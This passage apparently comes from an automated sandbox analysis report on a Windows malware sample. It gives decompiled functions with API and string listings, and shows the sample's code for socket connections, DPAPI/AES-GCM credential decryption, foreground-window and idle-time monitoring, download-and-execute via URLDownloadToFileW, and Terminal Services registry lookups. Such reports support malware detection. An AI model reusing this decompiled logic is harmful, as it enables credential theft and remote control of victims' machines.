                                    • Part of subcall function 0040594B: getaddrinfo.WS2_32(74A313FB,00000000,00404FB9,00000000), ref: 00405998
                                    • Part of subcall function 0040594B: socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                    • Part of subcall function 0040594B: htons.WS2_32(00000000), ref: 004059D5
                                    • Part of subcall function 0040594B: freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                    • Part of subcall function 0040594B: connect.WS2_32(?,?,00000010), ref: 004059F1
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040D101
                                  • EnterCriticalSection.KERNEL32(?), ref: 0040D11E
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0040D128
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                  • String ID:
                                  • API String ID: 4195813003-0
                                  • Opcode ID: 41f9955962fd48e9ea245ec66b04e5d3ca09e58cb9f6d5fe03a8e1ac849ee31d
                                  • Instruction ID: ffd892ab46af73f70c32251edc3eb7415e86c97fd1647a449630ba4d99c917e8
                                  • Opcode Fuzzy Hash: 41f9955962fd48e9ea245ec66b04e5d3ca09e58cb9f6d5fe03a8e1ac849ee31d
                                  • Instruction Fuzzy Hash: F9319771600506BBD704EBB1CC55FAEB7ACAF04358F00423AF51AB21D1DB78AA15CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410A8C, Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00410A8C(void* __ecx, void* __eflags) {
				void* _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				long _v20;
				long _v24;
				union _SID_NAME_USE _v28;
				short _v60;
				short _v580;
				void* _t37;

				_v20 = 0x10;
				_v8 = 0;
				_t37 = __ecx;
				_v16.Value = 0;
				_v12 = 0x500;
				E00401052( &_v580, 0, 0x208);
				_v24 = 0x104;
				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
					GetLastError();
				}
				if(_v8 != 0) {
					FreeSid(_v8);
				}
				E004036F7(_t37,  &_v580);
				return _t37;
			}












                                  0x00410a99
                                  0x00410aab
                                  0x00410ab0
                                  0x00410ab2
                                  0x00410ab5
                                  0x00410abb
                                  0x00410ac3
                                  0x00410ae9
                                  0x00410b10
                                  0x00410b10
                                  0x00410b19
                                  0x00410b1e
                                  0x00410b1e
                                  0x00410b2d
                                  0x00410b37

                                  APIs
                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D311,?,?,00000001), ref: 00410AE1
                                  • LookupAccountSidW.ADVAPI32(00000000,0040D311,?,00000104,?,00000010,?), ref: 00410B06
                                  • GetLastError.KERNEL32(?,?,00000001), ref: 00410B10
                                  • FreeSid.ADVAPI32(0040D311,?,?,00000001), ref: 00410B1E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                  • String ID:
                                  • API String ID: 1866703397-0
                                  • Opcode ID: 9bde5b841e5e6782f258dacd33f4a5e37663f90cec39e38d6a01389e9cc630e0
                                  • Instruction ID: 268544a994eea4337760f271e77acc5a4e560188a377bc451064b1715e62684d
                                  • Opcode Fuzzy Hash: 9bde5b841e5e6782f258dacd33f4a5e37663f90cec39e38d6a01389e9cc630e0
                                  • Instruction Fuzzy Hash: 0C11FE71A0020DABDB10DFD0DC89EEFB7BCEB08344F004476F205E2190D7749A849B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410BBE, Relevance: 6.1, APIs: 4, Instructions: 54libraryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00410BBE(WCHAR** __ecx, intOrPtr* __edx) {
				struct HRSRC__* _t13;
				void* _t14;
				unsigned int _t32;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;

				_t35 = __edx;
				_t36 = LoadLibraryExW( *__ecx, 0, 2);
				if(_t36 == 0xffffffff) {
					L4:
					return 0;
				}
				_t13 = FindResourceW(_t36, 1, 0x10);
				if(_t13 == 0) {
					goto L4;
				}
				_t14 = LoadResource(_t36, _t13);
				if(_t14 == 0) {
					goto L4;
				}
				_t32 =  *(_t14 + 0x28);
				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
				 *(_t35 + 8) = _t32 & 1;
				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
				FreeLibrary(_t36);
				return 1;
			}








                                  0x00410bc7
                                  0x00410bcf
                                  0x00410bd4
                                  0x00410c38
                                  0x00000000
                                  0x00410c38
                                  0x00410bdd
                                  0x00410be5
                                  0x00000000
                                  0x00000000
                                  0x00410be9
                                  0x00410bf1
                                  0x00000000
                                  0x00000000
                                  0x00410bf6
                                  0x00410bf9
                                  0x00410bff
                                  0x00410c0b
                                  0x00410c0f
                                  0x00410c24
                                  0x00410c28
                                  0x00410c2b
                                  0x00410c2e
                                  0x00000000

                                  APIs
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BC9
                                  • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BDD
                                  • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410BE9
                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0040DB4A), ref: 00410C2E
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadResource$FindFree
                                  • String ID:
                                  • API String ID: 3272429154-0
                                  • Opcode ID: 370e803f3f576e3dc6d64e982104e9389b7bb4e1ba6f79afae3c6c1c6fe46297
                                  • Instruction ID: f4e202401f230fa34ee939e17adc442f0fb496cb623fe9efe51c7003b0681515
                                  • Opcode Fuzzy Hash: 370e803f3f576e3dc6d64e982104e9389b7bb4e1ba6f79afae3c6c1c6fe46297
                                  • Instruction Fuzzy Hash: A601C0B5315A05AFD3184F299C84AA6B6A4FF49310704C239E825C73A0D7B8D891CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C157, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E0040C157(void* __ecx, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v16;
				void* _t16;
				void* _t19;
				void* _t34;
				void* _t35;

				_t35 = 0;
				_t16 = E0040C3B9(__ecx,  &_v12,  &_v8);
				_pop(_t26);
				if(_t16 == 0) {
					L8:
					return _t35;
				}
				_t34 = _v12;
				if(_v8 >= 5) {
					_t19 = E00401000(_t34, "DPAPI", 5);
					_t42 = _t19;
					if(_t19 == 0) {
						_push( &_v16);
						_push( &_v12);
						if(E0040C1DD(_t34 + 5, _v8 - 5, _t42) != 0) {
							if(_v16 == 0x20) {
								_t35 = E0040C419(_t22, _v12, _a8, _a12);
							}
							LocalFree(_v12);
						}
					}
				}
				LocalFree(_t34);
				goto L8;
			}










                                  0x0040c166
                                  0x0040c168
                                  0x0040c16d
                                  0x0040c170
                                  0x0040c1d8
                                  0x0040c1dc
                                  0x0040c1dc
                                  0x0040c176
                                  0x0040c179
                                  0x0040c183
                                  0x0040c18b
                                  0x0040c18d
                                  0x0040c196
                                  0x0040c19a
                                  0x0040c1ae
                                  0x0040c1b4
                                  0x0040c1c5
                                  0x0040c1c5
                                  0x0040c1ca
                                  0x0040c1ca
                                  0x0040c1ae
                                  0x0040c18d
                                  0x0040c1d1
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                    • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                    • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  • LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040C1D1
                                    • Part of subcall function 0040C1DD: GetLastError.KERNEL32 ref: 0040C243
                                  • LocalFree.KERNEL32(?), ref: 0040C1CA
                                    • Part of subcall function 0040C419: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040C1C4,?), ref: 0040C436
                                    • Part of subcall function 0040C419: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040C1C4,?), ref: 0040C44F
                                    • Part of subcall function 0040C419: BCryptGenerateSymmetricKey.BCRYPT(00000020,0040C1C4,00000000,00000000,?,00000020,00000000,?,0040C1C4,?), ref: 0040C464
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
                                  • String ID: $DPAPI
                                  • API String ID: 379455710-1819349886
                                  • Opcode ID: 723dafc30d50a614663938c1a140f779ca85de166bebee2fe5dd54bad53c82e3
                                  • Instruction ID: a3944bf262eb46a5dfa84945d41dbb41adefefd1d9f51366da1d16fc86cbb9f5
                                  • Opcode Fuzzy Hash: 723dafc30d50a614663938c1a140f779ca85de166bebee2fe5dd54bad53c82e3
                                  • Instruction Fuzzy Hash: ED016176900109EBCF10EBA1DC859EEB779AB44358F018276FD00B61C5E774AA45CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004048B7, Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E004048B7(intOrPtr _a4) {
				char _v8;
				struct tagLASTINPUTINFO _v16;
				signed int _v36;
				char _v40;
				short _v552;

				_v16.cbSize = 8;
				GetLastInputInfo( &_v16);
				_t23 = GetTickCount() - _v16.dwTime;
				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
				E004036F7( &_v8,  &_v552);
				_t12 =  &_v36;
				_v36 = _v36 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v40 = 0x15;
				asm("movups [ebp-0x1c], xmm0");
				E0040378B(E00403873(E00403852( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
				E00403777( &_v40);
				E00405FEB(_v8);
				return _a4;
			}








                                  0x004048c4
                                  0x004048cc
                                  0x004048d8
                                  0x004048f9
                                  0x00404909
                                  0x00404911
                                  0x00404911
                                  0x00404919
                                  0x0040491c
                                  0x00404927
                                  0x00404939
                                  0x00404941
                                  0x00404949
                                  0x00404953

                                  APIs
                                  • GetLastInputInfo.USER32 ref: 004048CC
                                  • GetTickCount.KERNEL32 ref: 004048D2
                                  • GetForegroundWindow.USER32 ref: 004048E6
                                  • GetWindowTextW.USER32 ref: 004048F9
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                  • String ID:
                                  • API String ID: 2567647128-0
                                  • Opcode ID: 2619e4c47768c66cf31bb9552d597a32af07dc8ffc93b02f453276f2778d0e8b
                                  • Instruction ID: 7d24786f3acb5e761febb0f7532cdf611125a99f062c3633d978c4158144353a
                                  • Opcode Fuzzy Hash: 2619e4c47768c66cf31bb9552d597a32af07dc8ffc93b02f453276f2778d0e8b
                                  • Instruction Fuzzy Hash: D2110C72D00109ABCB04EFA1DD59ADDBBBDEF58305F0081A9B406B7191EF78AB44CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041111B, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041111B() {
				void* _v8;
				long _v12;
				void _v16;
				long _t21;
				void* _t22;

				_t22 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t21 = 4;
					_v12 = _t21;
					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12);
					_t22 =  !=  ? _v16 : 0;
				}
				if(_v8 != 0) {
					CloseHandle(_v8);
				}
				return 0 | _t22 != 0x00000000;
			}








                                  0x00411125
                                  0x0041112a
                                  0x0041113c
                                  0x00411140
                                  0x00411144
                                  0x00411152
                                  0x0041115a
                                  0x0041115a
                                  0x00411162
                                  0x00411167
                                  0x00411167
                                  0x00411176

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                  • GetTokenInformation.ADVAPI32(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                  • CloseHandle.KERNEL32(00000000), ref: 00411167
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                  • String ID:
                                  • API String ID: 215268677-0
                                  • Opcode ID: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                  • Instruction ID: 0771c0d2f46ea20c01bd2ae64a6620b8b7ded6cbafb58bfe859f8e00c08c725d
                                  • Opcode Fuzzy Hash: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                  • Instruction Fuzzy Hash: 87F0F971E00218FBDB119BA0DD09BDEBBB8EF08751F118065EA01E61A0D7709F84DAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FFA8, Relevance: 6.0, APIs: 4, Instructions: 35threadsynchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040FFA8(void* __ecx) {
				void* _t14;
				long _t15;
				void** _t26;
				void* _t27;

				_t27 = __ecx;
				_t1 = _t27 + 0x14; // 0x42661c
				_t26 = _t1;
				if( *_t26 == 0) {
					L6:
					_t5 = _t27 + 0x10; // 0x426618
					E004101AB(_t5);
					_t6 = _t27 + 4; // 0x42660c
					E004101AB(_t6);
					_t7 = _t27 + 0xc; // 0x426614
					E004101AB(_t7);
					_t8 = _t27 + 8; // 0x426610
					_t14 = E004101AB(_t8);
					 *(_t27 + 0x18) =  *(_t27 + 0x18) & 0x00000000;
					return _t14;
				}
				_t15 = GetCurrentThreadId();
				_t2 = _t27 + 0x18; // 0x0
				if(_t15 ==  *_t2) {
					L5:
					E004101AB(_t26);
					goto L6;
				}
				if( *(_t27 + 0x10) == 0) {
					return _t15;
				}
				_t4 = _t27 + 0x10; // 0x0
				SetEvent( *_t4);
				if(WaitForSingleObject( *_t26, 0x1388) == 0x102) {
					TerminateThread( *_t26, 0xfffffffe);
				}
				goto L5;
			}







                                  0x0040ffa9
                                  0x0040ffac
                                  0x0040ffac
                                  0x0040ffb2
                                  0x0040fff3
                                  0x0040fff3
                                  0x0040fff6
                                  0x0040fffb
                                  0x0040fffe
                                  0x00410003
                                  0x00410006
                                  0x0041000b
                                  0x0041000e
                                  0x00410013
                                  0x00000000
                                  0x00410013
                                  0x0040ffb4
                                  0x0040ffba
                                  0x0040ffbd
                                  0x0040ffec
                                  0x0040ffee
                                  0x00000000
                                  0x0040ffee
                                  0x0040ffc3
                                  0x00410019
                                  0x00410019
                                  0x0040ffc5
                                  0x0040ffc8
                                  0x0040ffe0
                                  0x0040ffe6
                                  0x0040ffe6
                                  0x00000000

                                  APIs
                                  • GetCurrentThreadId.KERNEL32(?,00000000,00402BC7,00000000,exit,00000000,start), ref: 0040FFB4
                                  • SetEvent.KERNEL32(00000000), ref: 0040FFC8
                                  • WaitForSingleObject.KERNEL32(0042661C,00001388), ref: 0040FFD5
                                  • TerminateThread.KERNEL32(0042661C,000000FE), ref: 0040FFE6
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                  • String ID:
                                  • API String ID: 2174867186-0
                                  • Opcode ID: 9d65ee8b535991cc2c83cc34afe86964b00005fc8ac1bd73bdc2cdf835250f44
                                  • Instruction ID: feb65e06b3125344950c2ecfb6ecdf7295e9879baf5c0db247f31f74b0556ec4
                                  • Opcode Fuzzy Hash: 9d65ee8b535991cc2c83cc34afe86964b00005fc8ac1bd73bdc2cdf835250f44
                                  • Instruction Fuzzy Hash: 04011231004641EBE734AF11EC89AEA7BB2BF54315F504A3EF097515E2CBB969C9CA44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040290E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82filenetworkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 92%
                                  			E0040290E(void* __ecx, void* __eflags, signed int _a4) {
				short* _v12;
				void* _v16;
				char _v20;
				void* _t26;
				void* _t36;
				void* _t38;
				void* _t42;
				void* _t58;
				void* _t59;

				_t66 = __eflags;
				_t42 = __ecx;
				_t58 = 0x1a;
				E00410C8A( &_v12, _t58, __eflags);
				_t59 = 0xa;
				_t26 = E004035B9( &_v16, _t59, __eflags);
				E00403447(E0040357C( &_v12, _t59, _t66, "\\"), _t66, _t26);
				E00405FEB(_v16);
				_t61 = _a4 + 4;
				E0040373F( &_v16, _a4 + 4);
				E00403447( &_v12, _t66, E0040362F( &_v16,  &_a4));
				E00405FEB(_a4);
				_a4 = _a4 & 0x00000000;
				E00405FEB(_v16);
				_t36 = E0040373F( &_a4, _t61);
				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
				E00405FEB(_a4);
				if(_t36 == 0) {
					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
					_v16 = 2;
					__eflags = _t38 - 0x20;
					if(_t38 > 0x20) {
						_v16 = 0;
					}
				} else {
					_v16 = 1;
				}
				_v20 = 0x417810;
				E00405044(_t42,  &_v20);
				return E00405FEB(_v12);
			}












                                  0x0040290e
                                  0x00402917
                                  0x0040291e
                                  0x0040291f
                                  0x00402926
                                  0x0040292a
                                  0x00402941
                                  0x00402949
                                  0x00402954
                                  0x00402958
                                  0x0040296d
                                  0x00402975
                                  0x0040297d
                                  0x00402981
                                  0x0040298d
                                  0x0040299b
                                  0x004029a6
                                  0x004029ad
                                  0x004029c5
                                  0x004029cb
                                  0x004029d2
                                  0x004029d5
                                  0x004029d7
                                  0x004029d7
                                  0x004029af
                                  0x004029af
                                  0x004029af
                                  0x004029dd
                                  0x004029e7
                                  0x004029f8

                                  APIs
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 0040362F: PathFindExtensionW.SHLWAPI(?), ref: 00403639
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040299B
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 004029C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                  • String ID: open
                                  • API String ID: 4166385161-2758837156
                                  • Opcode ID: 1aebbe6f057188939f6ccd063137f4492537f7fa75c1047f87171207195197f8
                                  • Instruction ID: 7d7fc589e9963d25af6e0cc8dd23fda473545fd51eb9e29652c6e1dbcd1770d4
                                  • Opcode Fuzzy Hash: 1aebbe6f057188939f6ccd063137f4492537f7fa75c1047f87171207195197f8
                                  • Instruction Fuzzy Hash: 18214F71A00108BBCB15AFA6C885EEE7B78EF84759F00406AF416772C1DB785645CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004111D7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 32%
                                  			E004111D7(intOrPtr* __ecx, void* __edx) {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				int* _t18;
				void* _t48;
				int* _t50;

				_t48 = __edx;
				_t35 = __ecx;
				_t50 = __ecx;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				if( *0x55ad8c != 0) {
					_t18 = 0x55ad88;
				} else {
					RegOpenKeyExW(0x80000002,  *(E004036F7( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
					asm("sbb esi, esi");
					E00405FEB(_v12);
					if(1 != 0) {
						E00412569(_t48, E004036F7( &_v12, L"MachineGuid"),  &_v24);
						E00405FEB(_v12);
						E00412554( &_v8);
					}
					E00402FCE(_t50, E004061C0( &_v16,  &_v24));
					E00403148( &_v16);
					_t35 = 0x55ad88;
					_t18 = _t50;
				}
				E00402FCE(_t35, _t18);
				E00403148( &_v24);
				E00412554( &_v8);
				return _t50;
			}











                                  0x004111d7
                                  0x004111d7
                                  0x004111e1
                                  0x004111e3
                                  0x004111e6
                                  0x004111e9
                                  0x004111ec
                                  0x004111ee
                                  0x004111f7
                                  0x00411280
                                  0x004111fd
                                  0x0041121b
                                  0x00411226
                                  0x00411228
                                  0x00411230
                                  0x00411247
                                  0x0041124f
                                  0x00411257
                                  0x00411257
                                  0x0041126a
                                  0x00411272
                                  0x00411277
                                  0x0041127c
                                  0x0041127c
                                  0x00411286
                                  0x0041128e
                                  0x00411296
                                  0x004112a0

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0041121B
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                  • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                  • API String ID: 1903904756-1211650757
                                  • Opcode ID: 0878068cc0617e8ee81653ff448fb6a8a08afcac8a43ee38602db7464b46be7e
                                  • Instruction ID: abda254be5c657bc903fa0ced37de60f06049733804472e9a7e1bd392f4ec8b1
                                  • Opcode Fuzzy Hash: 0878068cc0617e8ee81653ff448fb6a8a08afcac8a43ee38602db7464b46be7e
                                  • Instruction Fuzzy Hash: 40115C30A0011AAACB04EF95C9628EEBB79AF54745B50016FF401B31D1DBB85F49DBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DCBF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040DCBF(void* __edx) {
				void* _v8;
				void* _v12;
				short* _v16;
				int _v20;
				char _v24;
				void* _t28;
				void* _t46;
				int _t48;

				_t46 = __edx;
				_v8 = 0;
				E004036F7( &_v16, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v24 = 0;
				_v20 = 0;
				if(RegOpenKeyExW(0x80000002, _v16, 0, 0x20119,  &_v8) != 0) {
					L3:
					_t48 = 0;
				} else {
					_t28 = E00412569(_t46, E004036F7( &_v12, L"ServiceDll"),  &_v24);
					E00405FEB(_v12);
					if(_t28 != 0) {
						_t48 = E0040335A(E0040300A( &_v24,  &_v12), 0x55ad4c);
						E00405FEB(_v12);
						_v12 = 0;
					} else {
						E00412554( &_v8);
						goto L3;
					}
				}
				E00403148( &_v24);
				E00405FEB(_v16);
				E00412554( &_v8);
				return _t48;
			}











                                  0x0040dcbf
                                  0x0040dcd1
                                  0x0040dcd4
                                  0x0040dcdc
                                  0x0040dce9
                                  0x0040dcf9
                                  0x0040dd2b
                                  0x0040dd2b
                                  0x0040dcfb
                                  0x0040dd10
                                  0x0040dd1a
                                  0x0040dd21
                                  0x0040dd66
                                  0x0040dd68
                                  0x0040dd6d
                                  0x0040dd23
                                  0x0040dd26
                                  0x00000000
                                  0x0040dd26
                                  0x0040dd21
                                  0x0040dd30
                                  0x0040dd38
                                  0x0040dd40
                                  0x0040dd4a

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,0055AD18,?,?,0040E2F1,?,?), ref: 0040DCF1
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  • ServiceDll, xrefs: 0040DCFF
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DCCC
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                  • API String ID: 1903904756-387424650
                                  • Opcode ID: 75b9c23a000a5adcdb465497512319edbf0587ad7d0d336b37f382028eb078bb
                                  • Instruction ID: 01bca762208379d142ed9eb01ac329b8ace23437b38cc5e4ab4ac662769df0df
